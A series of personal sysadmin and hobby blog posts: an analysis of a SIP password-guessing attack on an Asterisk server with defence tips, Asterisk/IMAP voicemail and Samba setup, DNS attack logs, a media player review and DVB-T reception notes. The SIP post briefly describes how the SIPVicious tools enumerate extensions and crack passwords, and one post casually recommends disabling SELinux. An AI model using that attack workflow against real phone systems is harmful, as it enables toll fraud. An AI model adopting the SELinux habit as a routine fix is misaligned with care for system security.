Feb  3 22:56:12 NOTICE[28514] chan_sip.c: Registration from '"9999"<sip:9999@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Username/auth name mismatch

It seems the reply tells the difference between valid and invalid account, because the attacker knows the valid accounts seen and starts trying those, probably trying to guess the password:

Feb  3 22:56:30 NOTICE[28514] chan_sip.c: Registration from '"1082"<sip:1082@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Wrong password
Feb  3 22:56:30 NOTICE[28514] chan_sip.c: Registration from '"1082"<sip:1082@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Wrong password
Feb  3 22:56:30 NOTICE[28514] chan_sip.c: Registration from '"1082"<sip:1082@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Wrong password
Feb  3 22:56:30 NOTICE[28514] chan_sip.c: Registration from '"1082"<sip:1082@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Wrong password
Feb  3 22:56:30 NOTICE[28514] chan_sip.c: Registration from '"1082"<sip:1082@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Wrong password
Feb  3 22:56:30 NOTICE[28514] chan_sip.c: Registration from '"1082"<sip:1082@xxx.yyy.zzz.xxx>' failed for '86.72.2.248' - Wrong password

The interesting difference: 98 tries for account 1082 and 9612 for account 1071. All failed: I guess using pwgen for sip passwords was a good idea after all.

It's a fast attack

Less than 10 minutes and if I would have had any weak passwords on one of the sip accounts I would have been toast. Most probable use of a found account: trying to call internationally on my dime.

I would almost consider setting up a dummy account with a bad password that would end up in a context where I just log all numbers tried. Almost.

What tools were probably used

Quite likely SIPVicious. I downloaded it myself and tried it on an asterisk server and got the same patterns in the logs. Using svwar you can map valid extension numbers and whether they need authorization and feed those to svcrack with a file of possible passwords.

How to defend against this

First of all: don't expose your SIP server to the Internet unless you really have good reasons to do so. And this is an interesting conflict: interesting SIP peering tricks depend on open access to your SIP port. But, at least Asterisk has an option to somewhat open yourself to the Internet at large but keep your own phones limited to your internal network: use deny and permit based acls.

Give your SIP accounts good passwords. Use pwgen or another password generating tool. A good reason to use automatic provisioning tools were both the configfile for the phone and the SIP account are autogenerated: you can use complicated generated passwords for your SIP accounts, add them to your PBX config automatically, add them to the phone config automatically and only the phone and the PBX need to know... that at least keeps out external attackers. The phone can still read the password from the config so an attacker with access to the config files can get at them too. And your provisioning tools can clean out any unused phone accounts so dormant accounts aren't abused either.

More people considered programmig twitter, and thinkgeek sells a device to make your plants send a twitter message when they need water.

Ok, the imap storage for asterisk voicemail works like the proverbial charm. I needed some work on the home dialplan and setup before I could test it, but I was able to leave a message to the home mailbox, seeing it stored in the voicemail imap box and retrieve and delete it using a telephone connected to the ISDN port accessing the VoicemailMain application. The access number for voicemail is now set to 0140-1233 to (sort of) stay in line with the Dutch numbering plan. There is no customer-service at 0140-1200 planned...

Ok, got that bit fixed too: asterisk uses imap as storage backend for voicemail. In modules.conf:

noload => app_voicemail_odbc.so
noload => app_voicemail.so
load => app_voicemail_imap.so

This is with the ubuntu package recompiled to use misdn, so the selection of voicemail storage is a question of which .so to load. In voicemail.conf :

[general]
imapserver=koos.idefix.net
imapfolder=INBOX.calls

[default]
9911 => 19999,House mailbox,,,Tz=european|imapuser=housemail|imappassword=S3cr1t

Now voicemail is saved only on the imap-server, so I can view it with Thunderbird. Or use the asterisk voicemail application to retrieve and delete it. That bit is not tested yet. After all the testing of drivers including heavy torture it's now time to set up a dialplan for the home pbx. Rule 1 of playing with the phones at home is that normal dialing still has to work so my wife can call the numbers without having to dial '0' for an outside line or other tricks, and that the phone in the living room rings when a call comes in. So I have to set up a 'number plan' which allows for special things but also makes all normal numbers work as they should. Solution: I use the 0140 area code, which is reserved (in the Netherlands) for test-numbers for the telecom provider. I am my own telecom provider so I can divert 0140 and do stuff with it, like provide voicemail or internal dialing.

IMAP can do great things, but more advanced things always seem half-documented and lots of searching. I tried to set up shared mailboxes. At home I want a shared mailbox for the voicemails from Asterisk so Mirjam and I can both check the imap inbox, listen to messages and delete them when they are not interesting anymore. Ideally I'd like asterisk to use IMAP as backend storage so we can still access the voicemail over the phone and deleting the voicemail via the phone menu is the same as deleting it from the imap server with a mail client (that's almost something like unified communications!). The next nicest option is to have the voicemails mailed to the shared voicemail mailbox. Still working on getting that fixed. Anyway, setting up the shared mailbox in courier is a bit vague. Not all documentation agrees, but finally the right answer is in /usr/share/doc/courier-base/README.sharedfolders.txt.gz how to set up a server shared mailbox via the shared mailbox index file set as IMAP_SHAREDINDEXFILE in /etc/courier/imapd. A lot of fiddling with rights was needed: by default shared mailbox users can't do anything with it. A light sprinkling of chmod 770 and chgrp voicemail fixed that. The last bit is that the imap server needs to know which other users have full access, using maildiracl to set this up. All now works and we can both read and delete mails. The shared box shows up as #shared.voicemail.calls next to the normal Inbox and Inbox.Sent.

Next needed was shared mailboxes at work so all members of the system group can see the mailboxes where cronjobs from all systems dump their stuff. I never got the same 'system shared mailbox' to work as at home so I decided to go for the 'filesystem shared mailbox' which is set up by creating a file shared-maildirs in your imap directory. That file just lists an alias and a base directory for the mailboxes to access. Rights on the shared boxes still need to be very open which is not my idea of a safe system. But that works, so everybody can see the 'postmaster', 'ups' and other boxes where system mail ends up and delete it when it is not an error message. Those shared boxes show up as shared.systeemgroep.ups and shared.systeemgroep.postmaster in Thunderbird and mutt (haven't checked other clients yet).

Back from snowboarding holiday in .. Samoëns, France. Yes, the same village as last year. The village, the Grand Massif ski area and especially the Viking Lodge apartment were so good we had to get back. I had fun snowboarding although I bruised a few ribs in a fall I had Wednesday on the Cascade piste: it turned icy and I lost balance and fell on my frontside.

I have a twitter. Somebody invited me for reasons I don't know but I thought "why not". It is so inviting to hook this up to some scripts so I can auto-process homepage updates or other automated scripts. Or hook it up to some sort of ticket system at work (probably on a separate account) so our users can follow our network changes.

The latest attacks: loads and loads of queries for the root nameservers, which gives amplification in resolvers with not completely perfect configurations (a complete list of root nameservers) and the same amount of traffic for resolvers which are completely closed to resolving for the outside world. These are probably an attempt to flood an IP using faked queries. Samples:

Jan 19 06:41:04 greenblatt named[6377]: client 69.50.142.110#53930: query (cache) './NS/IN' denied
Jan 19 06:41:13 greenblatt named[6377]: client 69.50.142.110#15557: query (cache) './NS/IN' denied
Jan 20 16:31:47 greenblatt named[6377]: client 66.230.160.1#32412: query (cache) './NS/IN' denied
Jan 20 16:31:59 greenblatt named[6377]: client 66.230.160.1#8478: query (cache) './NS/IN' denied

Already noted at sans: DNS queries for "." isc handler's dairy where the active IPs are listed. And suddenly I see in the logs:

Jan 20 08:36:13 greenblatt named[6377]: client 208.37.177.62#46265: query (cache) './NS/IN' denied
Jan 20 11:50:48 greenblatt named[6377]: client 208.37.177.62#46265: query (cache) './NS/IN' denied

I noticed that IP doing weird DNS stuff before. So 'being attacked' is the right conclusion.

Wardriving results 29 December - 19 January: 1915 new networks with GPS locations according to WiGLE. No planned wardrives but I did bring the wardriving box on some trips to places I hadn't visited in a while, so new networks popped up.

Hard to find and expensive, but we found it at work: the kvm switch that actually works. For us, that is. A environment of almost all x86 hardware with a mix of Linux and Windows as operating system.

Our older kvm switches either had no idea about this 'network' thing or (the Avocent Switchview IP) an approximation: the only working network client was the activex component served by its own webserver. Handy when you're at home using some ssh forwards and without internet explorer (or windows). No access. The 'about' box on that stuff said it was based on vnc but no vnc client could work with it.

But now we found the Adderview CATx IP. Cat-5 cable from the video + keyboard + mouse (usb) adapter to the adderview. And any recent vnc client will work with it, even over portforwarding via ssh links. The only downside is that the outgoing vga and keyboard connectors are on the back of the unit so it's a bit of a nuisance to plug in the 'crash-cart' (a table with wheels with a screen, keyboard and mouse on it) we use. Fixed this by using vga and usb extension cable.

I watched Wargames: The Dead Code (2008) this weekend. I'm not the movie reviewing type, but for this time I'll write something reviewish.
Why? The original: WarGames (1983). It must be the movie that influenced me most. It got me more interested in computers, taught me about modems, which led to BBSes, which led to Internet. I must have seen the original Wargames at least 30 times, if not more. Once in a movie theatre (probably in 1983/1984) but years later I taped it from TV and that tape was wearing out by the time I bought it on vhs tape and a few years later I bought the DVD.
This (Wargames, the dead code) is a weak remake. The original may not be a cinematographic masterpiece but this one has a lot less of a story. They try to build a number of parallels with the original but on some occasions that starts to look quite artificial.
At the end the big storyline is the same: big computer tries to take over US air defense and is about to cause total annihilation, hacker kid makes the computer think again by running a high number of simulations and finding out the best strategic move is not to play.
Transplantation from the 1980s to 2008 was done ok: cold war threat and parents that were unaware of their kids situation because of two jobs were replaced by terrorism threat, a father gone under suspicious circumstances and a single working mom. A lot of the 'the computer is watching you' stuff seemed to me right from 'Enemy of the state'.
I really missed a high-ranking officer saying "I'd piss on a sparkplug if it would do any good!"

I recently had the opportunity to test the Netgear EVA 8000 HD, my review of the Netgear EVA 8000 HD. But I am one of those people who does not run Windows at all at home, especially not as a server.

Accessing the content

The box only wants to access files via windows fileshares (also known as SMB shares or CIFS shares). Those are easy to set up in Linux using the Samba package. I simply added a few shares to /etc/samba/smb.conf like:

[revision3]
    comment = Revision3 movies
    path = /scratch/media2/revision3
    public = yes
    writable = no

[mp3]
    comment = mp3
    path = /scratch/mp3
    public = yes
    writable = no

This works, and the box can open files, play them. Setting them 'public' means you do not have to use the on-screen keypad of the mediaplayer to enter login names and passwords.

Creating a share for the 'data save location'

The 'media library management' of the Netgear EVA 8000 HD really likes a location to save its index files. I created a directory especially for this purpose:

drwxr-xr-x 6 nobody nogroup 4096 2009-01-18 11:39 /scratch/netgeareva

And created a samba share for it:

[netgeareva]
    comment = config path netgear eva
    path = /scratch/netgeareva
    public = yes
    writable = yes

Now the mediaplayer can save its library in this location and it will save a lot of time on scanning. The ownership by user nobody and the public = yes make sure no username/password is needed to access the share.

I got to play with a Netgear EVA 8000 HD from the hcc!pcgg. This is one of the 'network in, tv out' boxes being sold. There does not seem to be a real generic name for these devices yet. I'll stick to mediaplayer.

First impression

The first impression was caused by my wife who asked whether it can record TV. The answer is that it can't by itself, it needs a Windows PC with a supported TV-card.

What this mediaplayer can do by itself is play video files and audio files from windows (smb) fileshares or from usb storage. It can follow RSS news feeds and play attached videos. It can also work as a bittorrent client downloading content (I never tested this option).

Playing with it

I hooked it up to my home network and the TV. I first tried the component output connected to my AV receiver which should be able to convert that to S-video but that did not work (no color in the image). Probably more of a problem of the AV receiver. Composite video worked. Later I tried the scart connector and that works too. What I could not get it to do was output 16:9 content as palplus so the TV would automatically recognize it and scale it.

The Netgear EVA 8000 HD assumes you are a slob in organizing your media files and it just lists all files in alphabetical order or modification time order (newewst files first). The next better option it has is to browse all found folders in alphabetical order and look for files in each folder. I did organize my media stuff in a somewhat tree-like manner and it completely ignores this, you can't for example browse shares and directories in a tree-like way. Showing which directory you're in is an 'advanced' option.

But after that it just plays (almost all) content. Video files play, music plays. When it starts playing it will show 'Buffering content' but after that content plays without a hitch.

The big advantage of a media-player

The big advantage of a media-player is that it hooks up your tv to your video content. Suddenly you can just hang / lay down in front of the TV and watch your .avi files.

Specs

File formats

• Audio files: Mpeg-1 layer 1-3, flac, ac3, wav, m4a, wma, aac
• Audio playlists: Wpl, asx, wax, wv, pls, m3u, rmp
• Video formats: Vcd, Mpeg-2 video, mpeg-4 video, wmv9, mov with lots of codecs

This is also an area where the software updates made available by Netgear can help: newer codecs. There is always one more format that this device does not play (yet).

Network

• Wired: 100base-tx,10base-tx.
• Wireless: 802.11bg, WEP, WPA-PSK and WPA2-PSK.

It is good that the designers took into account that a device like this is not always close to a wired network. The small downside of connecting to a wireless network is that you spend a lot of time with the on-screen keyboard trying to enter the encryption keys. Wireless can have a shortage of bandwidth for some types of HD video.

Outputs

• Component
• Scart
• Composite
• S-video
• Hdmi
• Stereo audio
• Sp-dif

Looks like enough options to connect a European or American television and audio equipment of the latest or previous generation.

Conclusion

With the growth of the Internet as delivery system for video and audio content lots of people will be looking for a mediaplayer like this that can play their available content on a TV. Building a good user-interface for this is still complicated and the fact that this particular box does not take into account that some people can organize their content is a downside of the user-interface. Following generations of media player boxes will probably improve.

Positive

Lots of output options. Plug and play (for windows users), plug and almost play (for people who use other operating systems).

Negative

User-interface does not deal with organized media collections. No support for palplus.

Would I buy one myself

No. My wife has a very valid point: if you want a device like this, you want it to replace the video-recorder too. And harddisk video recorders are at the moment either very closed or very do-it-yourself. And digital TV makes this even more complicated as a lot of the digital TV equipment likes to listen to the content makers a lot more than to the owner of the device.

Interesting how conditions change, compared to the DX scan from yesterday Digitenne Bouquet 1 at 618 MHz (with Radio/TV Noord-Holland) is fine again and Mobile TV at 658 MHz is fine. Yesterday bouquet 1 had a very high error rate and 658 MHz did not show up at all. All with just w_scan. I think the location of the antenna is the key to these differences, centimeters movement make a lot of difference for certain frequencies.

Interesting DX conditions: A dvb-t scan using w_scan gives me Mobile-TV at 570 MHz and Digitenne bouquet 2 at 826 MHz easy (no tzap and dvbsnoop, just a simple scan).

New DX score: Digitenne bouquet 1 with Omroep Brabant at 546 MHz. Weak, but enough Service Descriptor Table was caught by dvbsnoop that I saw it. Transmitters of that bouquet are all over Brabant. I updated the DVB experiments overview with information on how I scan for signals and how I identify transmitters.

Barry Bouwsma, one of those people who have a measurable positive influence on clue-levels, explains to the linux-dvb mailing list how dvb-t uses single frequency networks (with multiple transmitters on the same frequency) and how receivers can cope with it. Now I understand how that works.

I've heard rumours about it before, but full details have been published now about the IPv6-powered TV network NTT uses in Japan. Actual working IPv6 multicast is used for broadcast channels. Set-top boxes make access to this easy and probably hide all those technical details from the viewer. Via NTT details IPv6-powered TV service (Networkworld).

I noticed some funny stuff on the maps plotted at the weather map site. Non-fitting temperatures like 28°C in the south of the Netherlands where it is -4°C to -8°C according to the people who know. Or 5°C at site 'EHDV' which was plotted somewhere in the eastern part of the country, near Marknesse, but the reading for Marknesse was not the same.

The first error was caused by the recent upgrade at home: Ubuntu comes with Geo::METAR 1.14. I did not notice this right away because they did fix the error about only accepting metar data from the USA. So I put in my own Geo::METAR which fixes the parsing. The other error was that EHDV was in the wrong location in my data. Searching using google found that EHDV is the code for oil platform D15-FA-1 which is also hard to find, but somewhere deep in the data history of air traffic control the Netherlands is the right location out on the North Sea. Where it is indeed a lot warmer than in the east of the country, thanks to less cold wind from the east and more warm wather from the Gulf stream.

Een mooi beeld vanmorgen toen ik even op het dak was om de aansluitingen van de schotel goed aan te draaien: door het koude weer was er een aardige laag rijp op de schotel neergeslagen.

Op het werk hebben we een satellietschotel geinstalleerd. Vandaar mijn interesse in voeten voor schotels een tijdje geleden: de schotel staat op een plat dak. Er is gekozen voor de canal digitaal triplesat set met Philips DSR 7121 HD satelliet ontvanger, dit wordt zo als pakket aangeboden door Canal Digitaal en satelliet dealers. HD televisie is het onderwerp van onderzoek.
Deze ontvanger is duidelijk in dienst van Canal Digitaal en niet van de eigenaar. Zonder smartcard weigert het apparaat totaal. En de kanaalnummering is wat er in de folder van Canaal Digitaal staat waarbij hooguit te zien is aan de zenderomschrijving of het signaal van Astra 19.2, 23.5 of 28.2 komt. De gebruiker heeft daar geen invloed op, die kan favorietenlijsten aanmaken.
Ik miste zonder meer alle 'ik weet het beter' knoppen: zo besloot de ontvanger dat als er een 16:9 TV aan hangt dat 4:3 beeld altijd uitgerekt moet worden. Ook hadden we enorm moeite met richten van de schotel omdat we daar geen ervaring mee hebben. Maar na richten met behulp van een satfinder bleef de ontvanger aangeven dat er geen signaal was, waarbij de kans dus aanwezig was dat de eerste LNB wel naar een satelliet gericht was maar niet naar de goede en het afstemmen dus niet lukte. Met een andere ontvanger lukte het wel en zagen we dat de schotel naar de goede satelliet gericht was, dus de ontvanger was duidelijk de 'schuldige'. Na een paar reboots zag deze ineens wel signaal. Pas dan kun je ook verder met deze ontvanger, zolang er geen signaal gevonden is mag je niets. Maar ook nadat een en ander ging werken en er twee software updates waren bleven de opties tot instellen heel beperkt en dan ook nog in lastige menu's. Een ander audio-kanaal kiezen is al lastig. En technische informatie is ook ver zoeken, met veel moeite is er achter te komen wat signaalsterkte en error rate zijn. Aantal bits in de data-stream van het kanaal of verdere technische informatie is niet op te vragen.
Ik weet nu heel zeker dat als ik ooit aan de satelliet ontvangst ga dat ik dan een ontvanger wil waar ik een stuk meer over te zeggen heb middels 'ik weet het beter' knopjes en die meer wil vertellen over technische details.

Url doing the rounds: TV radar. I am really interested whether there is any UK agency to complain to about this and whether the same problem would occur with Freeview UK (DVB-T based TV). According to the theory of DVB-T it can deal with multipathing a lot better. Sounds like an ideal place to test this theory.

At work we tried to run iscsi on a server. Two network interfaces, one for outside network, one for storage. The iscsi target was on the storage network behind eth1 and kept giving weird errors, which showed in the syslog like:

Jan  6 16:43:54 fokke iscsid: Could not bind connection 0 to eth1 
Jan  6 16:43:54 fokke iscsid: cannot make a connection to 172.16.0.3:3260 (1)
Jan  6 16:48:16 fokke iscsid: iSCSI logger with pid=21827 started!
Jan  6 16:48:17 fokke iscsid: transport class version 2.0-724. iscsid version 2.0-868
Jan  6 16:48:17 fokke iscsid: iSCSI daemon with pid=21828 started!
Jan  6 16:48:17 fokke iscsid: send fail Connection refused
Jan  6 16:48:37 fokke iscsid: Could not bind connection 0 to eth1 
Jan  6 16:48:37 fokke iscsid: cannot make a connection to 172.16.0.3:3260 (1)

The culprit? SELinux. Disabling SELinux completely made iscsid function normally and log in to the storage system and our configured volume show up. It seems SELinux gets in the way a lot of times, I usually have to disable it on systems.

Cold weather here in the Netherlands (at least for us).

Just seen in the ntp stats: A peak of 3271 packets/second of ntp traffic on ntp.cs.uu.nl.

Good to very good radio conditions at the moment. I just picked the following out of the air in the attic:

tune to: 674000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_AUTO:FEC_AUTO:QAM_AUTO:TRANSMISSION_MODE_8K:GUARD_INTERVAL_AUTO:HIERARCHY_NONE
Network Name 'WDR D'
0x0000 0x0064: pmt_pid 0x1330 ARD -- MDR S-Anhalt (running)
0x0000 0x0081: pmt_pid 0x1320 ARD -- NDR FS NDS * (running)
0x0000 0x00e2: pmt_pid 0x1340 ARD -- SWR Fernsehen RP (running)
0x0000 0x0104: pmt_pid 0x1310 ARD -- WDR Düsseldorf (running)
0x0000 0x0109: pmt_pid 0x1350 ARD -- WDR Wuppertal * (running)
0x0000 0x010b: pmt_pid 0x1360 ARD -- WDR Duisburg (running)

Totally unviewable due to all the errors, but the service list is correct. This should be the transmitter in Wesel, Germany at 113 Kilometer distance. Later on I realized how special this was: several hours later there wasn't even a hint of signal on 674 MHz. This was probably due to tropopsheric ducting, I saw an active area forecasted on William Hepburn's tropospheric ducting forecasts from roughly the center of the Netherlands going to the east.

I also saw Dutch Mobile-TV at 522 MHz (Utrecht), 530 MHz (several locations, weak signal), 570 MHz (several locations), 658 MHz (Lelystad).

I took the plunge and migrated from the old homeserver gosper to the new homeserver greenblatt. The physical migration was several hours of de-installing and installing hardware in the big tower case. Most software came up as planned, some minor nits to fix after stuff started running. Most statistics were only fixed after I got things running again, but the assorted sensors at home are available again.

Happy new year! Our cable-tv signal dropped completely last evening of 2008 at 23:10. I guess some fireworks may have taken it out. So we watched the rest of the evenings TV using the dvb-t stick and the laptop. I called the cable-company this morning and reported the malfunction. Several neighbours I asked in the street are also without cable-tv signal.
Later in the afternoon the signal came back.